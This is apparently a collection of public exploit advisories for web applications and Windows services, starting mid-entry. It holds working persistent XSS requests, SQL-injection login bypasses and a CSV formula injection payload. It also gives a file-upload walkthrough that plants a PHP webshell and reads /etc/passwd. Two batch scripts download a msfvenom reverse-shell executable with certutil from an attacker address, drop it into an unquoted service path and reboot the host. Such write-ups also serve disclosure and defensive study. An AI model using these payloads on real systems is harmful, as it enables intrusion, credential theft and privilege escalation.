triggered by adding payload in Item Name field in menu-add.php # POC No. 4 Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Made by field in menu-add.php # POC No. 5 Persistent XSS vulnerability at /dashboard/menu-list.php triggered by modifying value of Area(food_type) dropdown to XSS payload in menu-add.php ### Sample request POC #3, #4 & #5 POST /TableReservation/dashboard/manage-insert.php HTTP/1.1 Host: [TARGET URL/IP] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[TARGET URL/IP]/TableReservation/dashboard/menu-add.php Content-Type: multipart/form-data; boundary=---------------------------165343425917898292661480081499 Content-Length: 6641 Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="itemname" <script>alert("XSS1")</script> -----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="price" 1 -----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="madeby" <svg onload=alert("XSS2")> -----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="food_type" <svg onload=prompt("XSS4")> -----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="image"; filename="image.jpeg" Content-Type: image/jpeg .. [REDACTED CONTENT OF image.jpeg] .. ----------------------------165343425917898292661480081499 Content-Disposition: form-data; name="addItem" Add Item -----------------------------165343425917898292661480081499--

# Exploit Title: LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting # Date: 19-11-2020 # Exploit Author: Sagar Banwa # Vendor Homepage: https://lepton-cms.org/ # Software Link: https://lepton-cms.org/english/download/archive.php # Version: 4.7.0 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29240 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser. Vulnerable Parameters: Pages URL. Steps-To-Reproduce: 1. Login to the Admin Account 2. Go to the Menu-Pages-Pages Overview. 3. Now edit any page 4. Put the below payload in the url input box. 5.ex. https://localhost/_packinstall/"onmouseover=prompt(/xss/)> POST /LEPTONmvkzycfafg/modules/wrapper/save.php?leptoken=a8274f4a99bb3c2d1d857z1606411062 HTTP/1.1 Host: localhost Connection: close Content-Length: 130 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://localhost/LEPTONmvkzycfafg/backend/pages/modify.php?page_id=1&leptoken=33bfc986e094ce5dd7655z1606411059 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: lep5031sessionid=75627dd11a0e789c4e560f7a93cd3153 page_id=1&section_id=1&url=https%3A%2F%2Flocalhost%2F_packinstall%2F%22onmouseover%3Dprompt%28%2Fxss%2F%29%3E+&height=900

# Exploit Title: Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-09-18 # Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the CMS with any valid user credentials. Step 2: Select Measurement Settings and click on "Set Measurement Parts". Step 3: Create any php payload on locally on your system. ( i used the default php webshell in /usr/share/webshells/php/php-reverse-shell.php) Step 4: Fill the required details and upload the php payload you created using the image upload field. Step 5: Select Measurement Settings and click on "View/Edit Measurement Parts". Step 6: Start netcat listener. Step 7: Use the search filter to find your measurement and click on "edit" to trigger the php payload. ========================== OR ========================== Step 1: Embed an image with the code "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg" Step 2: Rename the malicious image to have include a ".php" extention. Example ( mv r0b0t.jpg r0b0t.jpg.php ) Step 3: Log in to the CMS with any valid user credentials. Step 4: Select Measurement Settings and click on "Set Measurement Parts". Step 5: Fill the required details and upload malicious image you created using the image upload field. Step 6: Select Measurement Settings and click on "View/Edit Measurement Parts". Step 7: Use the search filter to find your measurement and click on "edit" to edit details. Step 8: Righ click on the broken image and copy image location. Step 9: Paste image location in browser and you will have RCE. ( http://localhost/img/part/r0b0t.jpg.php?cmd=cat /etc/passwd )

# Exploit Title: Medical Center Portal Management System 1.0 - 'login' SQL Injection # Dork: N/A # Date: 2020-11-26 # Exploit Author: Aydın Baran Ertemir # Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi # Version: 1.0 # Category: Webapps # Tested on: Kali Linux # POC: # 1) # http://localhost/medic/pages/login.php # POST /medic/pages/processlogin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 57 Origin: http://localhost Connection: close Referer: http://localhost/medic/pages/login.php Cookie: PHPSESSID=ef7226c5aa187ed19ce1815df30e079e Upgrade-Insecure-Requests: 1 user=1%27+or+1%3D1%23&password=1%27+or+1%3D1%23&btnlogin=

# Exploit Title: Social Networking Site - Authentication Bypass (SQli) # Date: 2020-11-17 # Exploit Author: gh1mau # Email: [email protected] # Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/ # Vendor Homepage: https://www.sourcecodester.com/php/14601/social-networking-site-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14601&title=Social+Networking+Site+in+PHP%2FMySQLi+with+Full+Source+Code # Software Release Date: November 17, 2020 # Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64) Vulnerable File: ---------------- /signin_form.php Vulnerable Code: ----------------- Entry point: line 7: $email=$_POST['email']; line 8: $password=$_POST['password']; Exit point: line 10: $result = mysqli_query($con,"SELECT * FROM user WHERE email = '$email' and password='$password'"); Vulnerable Issue: ----------------- Attacker could bypass the authentication using simple sqli login bypass payload username: [email protected] password: ' or '1'='1

# Exploit Title: Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://pandorafms.com/ # Software Link: https://pandorafms.com/community/get-started/ # Version: Pandora FMS 7.0 NG 749 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "Edit OS" functionality of Pandora FMS. # Vulnerable Parameters : name, description # Patch Link : https://github.com/pandorafms/pandorafms/commit/58f521e8b570802fa33c75f99586e5b01b06731b #POC POST /pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 132 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 Upgrade-Insecure-Requests: 1 name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&icon=0&id_os=0&action=save&update_button=Create ############################################################################################################ # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "Private Enterprise Numbers" functionality of Pandora FMS. # Vulnerable Parameters : manufacturer, description # Patch Link : https://github.com/pandorafms/pandorafms/commit/b9b94e1382f6e340fd9f3136972cca4373f00eb0 #POC POST /pandora_console/ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------195778570630678476283866516641 Content-Length: 846 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=templates&sec2=godmode/modules/private_enterprise_numbers Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="is_new" 1 -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="page" godmode/modules/private_enterprise_numbers -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="method" add -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="pen" 123 -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="manufacturer" <img src=a onerror=alert(1)> -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="description" <img src=a onerror=alert(1)> -----------------------------195778570630678476283866516641-- ############################################################################################################ # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "Module Template Management" functionality of Pandora FMS. # Vulnerable Parameters : name, description # Patch Link : https://github.com/pandorafms/pandorafms/commit/e833c318a5a91d6d709a5b266c1245261b4c0e70 # POC POST /pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 316 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 Upgrade-Insecure-Requests: 1 id_np=0&valid-pen=1%2C2%2C4%2C9%2C11%2C63%2C111%2C116%2C123%2C171%2C173%2C188%2C207%2C674%2C2021%2C2636%2C3375%2C3861%2C6486%2C6574%2C8072%2C10002%2C12356%2C13062%2C14988%2C19464%2C41112%2C52627%2C53526%2C&name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&pen=&action_button=Create

# Exploit Title: Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path # Discovery by: Emmanuel Lujan # Discovery Date: 2020-11-26 # Vendor Homepage: https://www.acer.com/ac/en/US/content/home # Tested Version: 1.0.0.3 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 7 Home Premium x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ GREGService GREGServ ice C:\Program Files (x86)\Acer\Registration\G REGsvc.exe Auto # Service info: C:\>sc qc GregService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: GREGService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Acer\Registration\GREGsvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : GREGService DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

#Exploit Title: EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2020-27-11 #Vendor : SEIKO EPSON Corp #Version : EPSON_PM_RPCV4_06 8.0 #Vendor Homepage : https://epson.com #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\>sc qc EPSON_PM_RPCV4_06 [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: EPSON_PM_RPCV4_06 TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : EPSON V3 Service4(06) DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path # Discovery by: Jok3r # Discovery Date: 2020-09-14 # Vendor Homepage: https://home.pearsonvue.com/ # Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm # Tested Version: 2.3.1911 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es #Description: The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test center’s server. VUEApplicationWrapper service has an unquoted service path vulnerability and insecure file permissions on "\Pearson VUE\" directory that allows to overwrite by everyone so that unauthorized local user can leverage privileges to VUEService user that has administrative rights. # Detection of unquoted service path: C:\Users\VUEService>wmic service get name, pathname, displayname, startmode| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |findstr /i /v """ VUE Application Wrapper VUEApplicationWrapper C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe Auto C:\Users\VUEService>sc qc VUEApplicationWrapper [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VUEApplicationWrapper TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Pearson VUE\VUE TestingSystem\bin\VUEWrapper.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VUE Application Wrapper DEPENDENCIES : lanmanworkstation SERVICE_START_NAME : .\VUEService #Detection of insecure file permissions: PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\" Directory: C:\ Path Owner Access ---- ----- ------ Pearson Vue BUILTIN\Administrators Everyone Allow FullControl... #Exploit code: ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i"Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """" wmic service get name,pathname,displayname,startmode | findstr /i "Auto" |findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """ sc qc VUEApplicationWrapper powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'" ECHO [+] Enumeration was completed successfully. ::Create VUE.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell. ::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address>LPORT=443 -f exe > VUE.exe ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after windows was rebooted. certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\PearsonVUE\VUE.exe" ECHO [*] Downloading VUE executable... PAUSE IF EXIST "C:\Pearson VUE\VUE.exe" ( ECHO [+] The download was successful. ) ELSE ( ECHO [-] The download was unsuccessful. PAUSE ) ECHO [!] If you continue, system will be rebooted. PAUSE shutdown /r /t 0 ::code end

#Exploit Title: Tendenci 12.3.1 - CSV/ Formula Injection #Date: 2020-10-29 #Exploit Author: Mufaddal Masalawala #Vendor Homepage: https://www.tendenci.com/ #Software Link: https://github.com/tendenci/tendenci #Version: 12.3.1 #Payload: =10+20+cmd|' /C calc'!A0 #Tested on: Kali Linux 2020.3 #Proof Of Concept: CSV Injection (aka Excel Macro Injection or Formula Injection) exists in Contact Us feature in Tendenci v12.3.1 via message field that is mistreated while exporting to a CSV file. To exploit this vulnerability: 1. Go to contact us page and enter the payload "=10+20+cmd|' /C calc'!A0" in the message field and submit the form 2. Login to the application and go to Forms section and export the contact us form entries 3. Click on Export and save the CSV file downloaded 4. Open the CSV file, allow all popups and our payload is executed (calculator is opened).

# Exploit Title: Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path # Date: 2020-08-28 # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.intel.com/ # Version: v5.2 # Tested on: Windows 7 # Source: https://www.totalpentest.com/post/intel-r-user-notification-service-unquoted-service-path-privilege-escalation @ECHO OFF ECHO ======================================================================================================================= ECHO INTEL(R) MANAGEMENT AND SECURITY APPLICATION USER NOTIFICATION SERVICE 5.2 - Unquoted Service Path Privilege Escalation ECHO ======================================================================================================================= ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """" wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ sc qc UNS ECHO [+] Your mandoroty level is: whoami /groups | findstr /B /C:"Mandatory Label" ::Create Privacy.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell. ::msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > Privacy.exe ECHO [?] ECHO [+] Enumeration was completed successfully. ECHO [?] If you create Privacy.exe under Intel directory with your privileges, you might be able to get SYSTEM reverse shell after windows was rebooted. PAUSE certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/Privacy.exe "C:\Program Files (x86)\Common Files\Intel\Privacy.exe" IF EXIST "C:\Program Files (x86)\Common Files\Intel\Privacy.exe" ( ECHO [+] The download was successful. ) ELSE ( ECHO [-] The download was unsuccessful. PAUSE ) ECHO [!] If you continue, system will reboot. PAUSE shutdown /r /t 0 ::code end #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.